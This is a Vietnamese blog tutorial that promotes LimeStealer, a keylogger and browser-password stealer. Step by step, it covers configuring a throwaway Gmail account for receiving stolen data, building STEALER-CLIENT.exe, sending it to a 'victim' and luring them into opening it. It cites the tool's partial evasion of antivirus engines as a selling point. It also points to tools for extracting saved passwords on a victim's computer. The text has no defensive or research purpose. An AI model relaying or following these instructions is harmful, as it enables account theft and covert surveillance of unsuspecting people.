LimeStealer là một Keylogger đơn giản có chức năng đánh cắp Password đã lưu trên trình duyệt. Với thói quen cá nhân bạn thường ‘Remember Password’ vào trình duyệt để tiện lần sau không phải nhập lại. Nhưng đây lại là lỗ hỏng để Hacker có thể đánh cắp tất cả tài khoản của bạn. Khi nạn hân kích hoạt LimeStealer, toàn bộ Password bạn đã lưu trên Chrome, Opera, Firefox… đều được gửi về mail Hacker.
Bên cạnh đó LimeStealer có thể chụp lại màn hình và gửi về Email cho bạn. Khi đó bạn vừa biết được Password vừa xem được nạn nhân đang làm gì trên máy tính.
Danh sách các trình duyệt mà LimeStealer có thể lấy được Password:
- Chrome
- Firefox
- Opera
- Yandex
- Vivaldi
- Chromium
- Comodo
- Xpom
- Orbitum
- Kometa
- Amigo
- Nichrom
- Brave
Download Keylogger LimeStealer v.01
Trước tiên, bạn cần tạo cho mình 1 tài khoản Gmail mới để nhận thông tin từ Keylog. Vì khi cấu hình, LimeStealer sẽ yêu cầu bạn nhập User và Password của Gmail. Do đó, để bảo đảm an toàn thì bạn không nên dùng Gmail chính của mình.
(Password: anonyviet.com)
Tải về và giải nén ra, điền thông tin như hình bên dưới:
- Email: gõ rõ ra là @gmail.com luôn. Ví dụ: [email protected]
- Password: là mật khẩu của Email ở trên
- Smtp: giữ nguyên là smtp.gmail.com
Sau đó nhấn nút Build
Khi đó, phần mềm sẽ tạo ra file tên là: STEALER-CLIENT.exe
(Mình dùng Virustotal quét thử thì chỉ có 28/72 trình diệt virus. Khả năng thành công của bạn là khá cao.)
Nhiệm vụ của bạn là gửi file STEALER-CLIENT.exe cho nạn nhân và dụ dỗ họ mở lên. [Phương pháp dụ dỗ tùy vào trình khéo ăn khéo nói của bạn. Đọc thêm các bài về Social Engineering để nghiên cứu nhé.]
Sau khi nạn nhân kích hoạt, Email của bạn sẽ nhận được 1 mail gửi về như hình bên dưới:
Tất cả Password được lưu trên trình duyệt sẽ gửi về Email cho bạn.
Nếu bạn có thể truy cập vào máy nạn nhân được, thì dùng Công cụ giải mã và hack mật khẩu lưu trữ trên Google Chrome hoặc Tool lấy mật khẩu đã lưu trên trình duyệt WebBrowserPassView để xem Password ngay trên máy tính.